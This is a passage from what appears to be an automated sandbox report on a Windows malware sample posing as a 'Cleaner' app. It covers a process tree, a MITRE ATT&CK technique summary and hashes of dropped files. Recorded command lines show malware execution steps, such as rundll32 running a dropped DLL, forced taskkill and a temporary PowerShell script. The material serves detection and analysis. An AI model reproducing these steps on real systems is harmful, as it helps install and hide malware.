                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1644,9680902712225736938,11686594769644362189,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6004_1554042330" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2632 /prefetch:1
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                  PID:8948
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,9680902712225736938,11686594769644362189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6004_1554042330" --mojo-platform-channel-handle=1464 /prefetch:8
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:5240
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1644,9680902712225736938,11686594769644362189,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6004_1554042330" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3372 /prefetch:2
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:6332
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,9680902712225736938,11686594769644362189,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6004_1554042330" --mojo-platform-channel-handle=2148 /prefetch:8
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:8912
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,9680902712225736938,11686594769644362189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6004_1554042330" --mojo-platform-channel-handle=2724 /prefetch:8
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:7684
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,9680902712225736938,11686594769644362189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6004_1554042330" --mojo-platform-channel-handle=3608 /prefetch:8
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:7456
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,9680902712225736938,11686594769644362189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6004_1554042330" --mojo-platform-channel-handle=2772 /prefetch:8
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:6572
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_6B52.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:8936
                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 572F2AA8F210632BAB29BCA484BE3224
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          PID:9124
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                            "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                            PID:8648
                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 8B2FEF6DDBB155E8F519EC4CCA92DDC7 E Global\MSI0000
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:6572
                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          PID:688
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                            PID:7040
                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          PID:7108
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                            PID:4364
                                                                                                                                                                                                                                                        • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:4548
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                          PID:7308
                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                          PID:6272
                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                          PID:8908
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:8920
                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                            PID:7292
                                                                                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                              DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{33468023-3cc8-4142-802c-4c166a778020}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:952
                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                PID:7848
                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:7384
                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                PID:3092
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                PID:8884
                                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                PID:2824
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                  MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:9028
                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                  PID:1240
                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                  PID:4692
                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:8016
                                                                                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20210821-1238.dm
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:4292
                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:6956
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                        PID:952
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:5412
                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:7852
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:2816
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:8864
                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:8976
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:8752
                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:7484
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:5008
                                                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:6112

                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                        T1089

                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                        T1130

                                                                                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                        T1081

                                                                                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                                                                                        Software Discovery

                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                        T1518

                                                                                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                                                                                        7
                                                                                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                                                                                        7
                                                                                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                        T1120

                                                                                                                                                                                                                                                                                        Remote System Discovery

                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                        T1018

                                                                                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          8690d4cc29a3c112ee7f6eb3981ac438

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          9e1613d8880a003ac49e52150853673afcd7c8be

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          68c926b002e8f4e0784481ea5b902f0a86991ef47787300c913c17821af510c9

                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                          4caafb3cc066b7bb366e849117f86b36e5bc5bef48ee66e7a2fbab83c3613fe119946f80524423ccc85434223fd1aefeab472005e0d1f462101ba080c43286f3

                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                          86d7d11b829235239c106a4639e4acb0

                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                          7ce716129acd7f4461f88d8dc36d9b92fe14a04f

                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                          df469bc619da67534e898ac1e15609c7b6b3d84ede19390b9a91ab0b38b48f2f

                                                                                                                                                                                                                                                                                          SHA512

